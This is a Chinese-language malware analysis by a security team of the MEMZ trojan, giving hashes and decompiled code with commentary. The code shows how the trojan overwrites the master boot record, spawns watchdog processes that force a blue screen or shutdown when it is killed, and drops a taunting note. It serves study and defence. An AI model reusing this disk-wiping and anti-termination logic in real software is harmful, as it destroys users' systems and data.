本篇文章由ChaMd5安全团逆向样本小组投稿
IOC
病毒名称:彩虹猫(MEMZ.exe)
来源:https://app.any.run/tasks/3ffef12e-bddd-4c57-8aa5-906711a7b045/
作用:篡改MBR分区,使用户启动只能显示彩虹猫画面;运行时鼠标键盘完全无用,会重复打开应用,耗尽系统资源。
SHA256:A3D5715A81F2FBEB5F76C88C9C21EEEE87142909716472F911FF6950C790C24D
SHA1:6FED7732F7CB6F59743795B2AB154A3676F4C822
MD5:19DBEC50735B5F2A72D4199C4E184960
概述
这个病毒应该大神弄的重置版,因为有一定警示。同样apprun上面还有其它语言版本,包括js,.net等
分析
IDA打开,主线程会进行警示
if ( MessageBoxA(
0,
"The software you just executed is considered malware.rn"
"This malware will harm your computer and makes it unusable.rn"
"If you are seeing this message without knowing what you just executed, simply press No and nothing will happen."
"rn"
"If you know what this malware does and are using a safe environment to test, press Yes to start it.rn"
"rn"
"DO YOU WANT TO EXECUTE THIS MALWARE, RESULTING IN AN UNUSABLE MACHINE?",
"MEMZ",
0x34u) == 6
&& MessageBoxA(
0,
"THIS IS THE LAST WARNING!rn"
"rn"
"THE CREATOR IS NOT RESPONSIBLE FOR ANY DAMAGE MADE USING THIS MALWARE!rn"
"STILL EXECUTE IT?",
"MEMZ",
0x34u) == 6 )
如果用户忽略这两个警示,则程序开始创建子进程,重新运行自身
v10 = (WCHAR *)LocalAlloc(0x40u, 0x4000u);
GetModuleFileNameW(0, v10, 0x2000u);
v11 = 5;
do
{
ShellExecuteW(0, 0, v10, L"/watchdog", 0, 10);
--v11;
}
while ( v11 );
pExecInfo.cbSize = 60;
pExecInfo.lpFile = v10;
pExecInfo.lpParameters = L"/main";
pExecInfo.fMask = 64;
pExecInfo.hwnd = 0;
pExecInfo.lpVerb = 0;
pExecInfo.lpDirectory = 0;
pExecInfo.hInstApp = 0;
pExecInfo.nShow = 10;
ShellExecuteExW(&pExecInfo);
SetPriorityClass(pExecInfo.hProcess, 0x80u);
其中5个子进程以/watchdog为参数,1个子进程以/main为参数
/watchdog参数
if ( !lstrcmpW(v1[1], L"/watchdog") )
{
CreateThread(0, 0, sub_40114A, 0, 0, 0);
pExecInfo.lpVerb = (LPCWSTR)48;
pExecInfo.lpParameters = (LPCWSTR)sub_401000;
pExecInfo.hIcon = (HANDLE)"hax";
pExecInfo.lpFile = 0;
pExecInfo.lpDirectory = 0;
pExecInfo.nShow = 0;
pExecInfo.hInstApp = 0;
pExecInfo.lpIDList = 0;
pExecInfo.lpClass = 0;
pExecInfo.hkeyClass = 0;
pExecInfo.dwHotKey = 0;
pExecInfo.hProcess = 0;
RegisterClassExA((const WNDCLASSEXA *)&pExecInfo.lpVerb);
CreateWindowExA(0, "hax", 0, 0, 0, 0, 100, 100, 0, 0, 0, 0);
while ( GetMessageW(&Msg, 0, 0, 0) > 0 )
{
TranslateMessage(&Msg);
DispatchMessageW(&Msg);
}
}
会创建一个sub_40114A线程,并且使用sub_401000函数监听消息。
sub_40114A函数
lpString1 = (LPCSTR)LocalAlloc(0x40u, 0x200u);
v1 = GetCurrentProcess();
GetProcessImageFileNameA(v1, lpString1, 512);// 获取自己的可执行文件名称
Sleep(0x3E8u);
while ( 1 )
{
v2 = CreateToolhelp32Snapshot(2u, 0);
pe.dwSize = 556;
Process32FirstW(v2, &pe);
v3 = lpString1;
v4 = 0;
do
{
hObject = OpenProcess(0x400u, 0, pe.th32ProcessID);
lpString2 = (LPCSTR)LocalAlloc(0x40u, 0x200u);
GetProcessImageFileNameA(hObject, lpString2, 512);
if ( !lstrcmpA(v3, lpString2) ) // 查看一下该程序在内存中的进程数
++v4;
CloseHandle(hObject);
LocalFree((HLOCAL)lpString2);
}
while ( Process32NextW(v2, &pe) );
CloseHandle(v2);
if ( v4 < v7 ) // 如果这次内存中的进程少于上次遍历,则执行下面的函数
sub_401021();
v7 = v4;
Sleep(0xAu);
其中sub_401021用于关闭计算机
do
{
CreateThread(0, 0x1000u, StartAddress, 0, 0, 0);
Sleep(0x64u);
--v1;
}
while ( v1 );
v2 = v14;
v14 = a1;
v9 = v2;
v3 = LoadLibraryA("ntdll");
RtlAdjustPrivilege = GetProcAddress(v3, "RtlAdjustPrivilege");
NtRaiseHardError = GetProcAddress(v3, "NtRaiseHardError");
v6 = (void (__cdecl *)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD))NtRaiseHardError;
if ( RtlAdjustPrivilege && NtRaiseHardError ) // 如果有权限就引起蓝屏异常
{
((void (__cdecl *)(int, int, _DWORD, char *, int, int))RtlAdjustPrivilege)(19, 1, 0, (char *)&v13 + 3, v13, v9);
v6(-1073741790, 0, 0, 0, 6, &v11);
}
v7 = GetCurrentProcess();
OpenProcessToken(v7, 0x28u, &v12);
LookupPrivilegeValueW(0, L"SeShutdownPrivilege", (PLUID)v10.Privileges);
v10.PrivilegeCount = 1;
v10.Privileges[0].Attributes = 2;
AdjustTokenPrivileges(v12, 0, &v10, 0, 0, 0);
return ExitWindowsEx(6u, 0x10007u); // 否则强制关机
startAddress
StartAddress:
push esi
call ds:GetCurrentThreadId
push eax ; dwThreadId
push 0 ; hmod
push offset fn ; lpfn
push 5 ; idHook
call ds:SetWindowsHookExW
push 1010h ; uType
push offset Caption ; "MEMZ"
mov esi, eax
call sub_401A55
xor edx, edx
div ds:dword_402AD0
push lpText[edx*4] ; lpText
push 0 ; hWnd
call ds:MessageBoxA
push esi ; hhk
call ds:UnhookWindowsHookEx
xor eax, eax
pop esi
retn 4
也就是说,如果用户尝试关闭彩虹猫,该程序会尝试重复创建窗口,并强制蓝屏或死机
sub_401000函数
if ( Msg != 16 && Msg != 22 )
return DefWindowProcW(hWnd, Msg, wParam, lParam);
sub_401021((int)&savedregs);
只捕获16和22号消息,即关闭窗口和结束会话。如果有这两个消息,则执行sub_401021函数,即创建窗口和强制关机函数。
/main函数
v2 = CreateFileA("\\.\PhysicalDrive0", 0xC0000000, 3u, 0, 3u, 0, 0); //获取MBR分区句柄
hObject = v2;
if ( v2 == (HANDLE)-1 )
ExitProcess(2u);
v3 = 0;
v4 = LocalAlloc(0x40u, 0x10000u);
v5 = v4;
do
{
++v3;
*v5 = v5[byte_402118 - v4];
++v5;
}
while ( v3 < 0x12F );
for ( i = 0; i < 0x7A0; ++i )
v4[i + 510] = byte_402248[i]; // 写入的数据是byte_402248
if ( !WriteFile(v2, v4, 0x10000u, &NumberOfBytesWritten, 0) ) // 写入MBR分区
ExitProcess(3u);
CloseHandle(hObject);
v7 = CreateFileA("\note.txt", 0xC0000000, 3u, 0, 2u, 0x80u, 0);
if ( v7 == (HANDLE)-1 )
ExitProcess(4u);
if ( !WriteFile(
v7,
"YOUR COMPUTER HAS BEEN FUCKED BY THE MEMZ TROJAN.rn"
"rn"
"Your computer won't boot up again,rn"
"so use it as long as you can!rn"
"rn"
":Drn"
"rn"
"Trying to kill MEMZ will cause your system to bern"
"destroyed instantly, so don't try it :D",
0xDAu,
&NumberOfBytesWritten,
0) )
ExitProcess(5u);
CloseHandle(v7);
ShellExecuteA(0, 0, "notepad", "\note.txt", 0, 10);
v8 = 0;
v9 = (DWORD *)&off_405130; // 指向一系列函数和参数
do
{
Sleep(v9[1]);
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)sub_401A2B, v9, 0, 0); // sub_401A2B单纯地执行第一个参数指向的函数
++v8;
v9 += 2;
}
while ( v8 < 0xA );
while ( 1 )
Sleep(0x2710u);
这里修改了MBR分区,然后使用notepad显示提示。创建了线程执行一系列动作
int __cdecl sub_4014FC(int a1)
{
int v1; // ecx
unsigned int v2; // eax
int v3; // ecx
int v4; // eax
v2 = sub_401A55(v1);
ShellExecuteA(0, "open", (&lpFile)[v2 % 0x2E], 0, 0, 10); // lpFile指向一些链接
v4 = sub_401A55(v3);
return sub_401B09(
COERCE_UNSIGNED_INT64((double)a1),
HIDWORD(COERCE_UNSIGNED_INT64((double)a1)),
(double)(v4 % 200) + 1500.0 / ((double)a1 / 15.0 + 1.0) + 100.0);
}
off_405130指向的函数
.data:00405130 off_405130 dd offset openLinks ; DATA XREF: start+1F1↑o
.data:00405134 db 30h ; 0
.data:00405135 db 75h ; u
.data:00405136 db 0
.data:00405137 db 0
.data:00405138 dd offset moveCursor
.data:0040513C db 30h ; 0
.data:0040513D db 75h ; u
.data:0040513E db 0
.data:0040513F db 0
.data:00405140 dd offset randomInput
.data:00405144 db 20h
.data:00405145 db 4Eh ; N
.data:00405146 db 0
.data:00405147 db 0
.data:00405148 dd offset playSound
.data:0040514C db 50h ; P
.data:0040514D db 0C3h
.data:0040514E db 0
.data:0040514F db 0
.data:00405150 dd offset drawRect
.data:00405154 db 30h ; 0
.data:00405155 db 75h ; u
.data:00405156 db 0
.data:00405157 db 0
;...
可见这些函数就是阻止各种输入和制造视听觉上面的干扰。
总结
彩虹猫病毒对系统的破坏性较大,但是程序逻辑并没有混淆隐藏,所以整体分析过程比较顺利。
可以通过重装系统或修复引导分区进行修复。
end
招新小广告
ChaMd5 Venom 招收大佬入圈
新成立组IOT+工控+样本分析+AI 长期招新
本文始发于微信公众号(ChaMd5安全团队):彩虹猫病毒分析(MEMZ)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论